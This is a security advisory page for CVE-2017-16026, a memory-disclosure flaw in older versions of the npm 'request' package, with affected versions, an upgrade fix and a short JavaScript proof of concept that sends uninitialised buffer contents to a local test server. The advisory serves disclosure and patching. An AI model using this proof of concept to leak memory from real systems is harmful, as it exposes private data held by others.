26/4/2018
9/11/2018
5/8/2024
CVE-2017-16026: Input Validation
First published: Thu Apr 26 2018(Updated: )
Affected versions of `request` will disclose local system memory to remote systems in certain circumstances. When a multipart request is made, and the type of `body` is `number`, then a buffer of that size will be allocated and sent to the remote server as the body.
## Proof of Concept
```js
var request = require('request');
var http = require('http');
var serveFunction = function (req, res){
req.on('data', function (data) {
console.log(data)
});
res.end();
};
var server = http.createServer(serveFunction);
server.listen(8000);
request({
method: "POST",
uri: 'http://localhost:8000',
multipart: [{body:500}]
},function(err,res,body){});
```
## Recommendation
Update to version 2.68.0 or later
Credit: support@hackerone.com support@hackerone.com
Affected Software | Affected Version | How to fix |
---|
Request Project Request | >=2.2.6<2.47.0 | |
Request Project Request | >2.51.0<=2.67.0 | |
Never miss a vulnerability like this again
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
Frequently Asked Questions
What is the severity of CVE-2017-16026?
The severity of CVE-2017-16026 is high (5.9).
How does CVE-2017-16026 affect request?
CVE-2017-16026 affects certain versions of the `request` package.
What is the impact of CVE-2017-16026?
CVE-2017-16026 can disclose local system memory to remote systems in certain circumstances.
How can I fix CVE-2017-16026?
To fix CVE-2017-16026, upgrade to version 2.68.0 or apply the appropriate patches.
Where can I find more information about CVE-2017-16026?
You can find more information about CVE-2017-16026 on the NVD website and GitHub.
- collector/github-advisory-latest
- alias/GHSA-7xfp-9c55-5vqj
- alias/CVE-2017-16026
- collector/github-advisory
- collector/nvd-index
- collector/nvd-cve
- agent/author
- agent/type
- agent/softwarecombine
- collector/mitre-cve
- source/MITRE
- agent/last-modified-date
- agent/severity
- agent/references
- agent/weakness
- agent/first-publish-date
- agent/event
- agent/tags
- agent/description
- agent/trending
- package-manager/npm
- vendor/request project
- canonical/request project request
- version/request project request/2.2.6
- version/request project request/2.67.0
Contact
SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.coBy using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2024 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203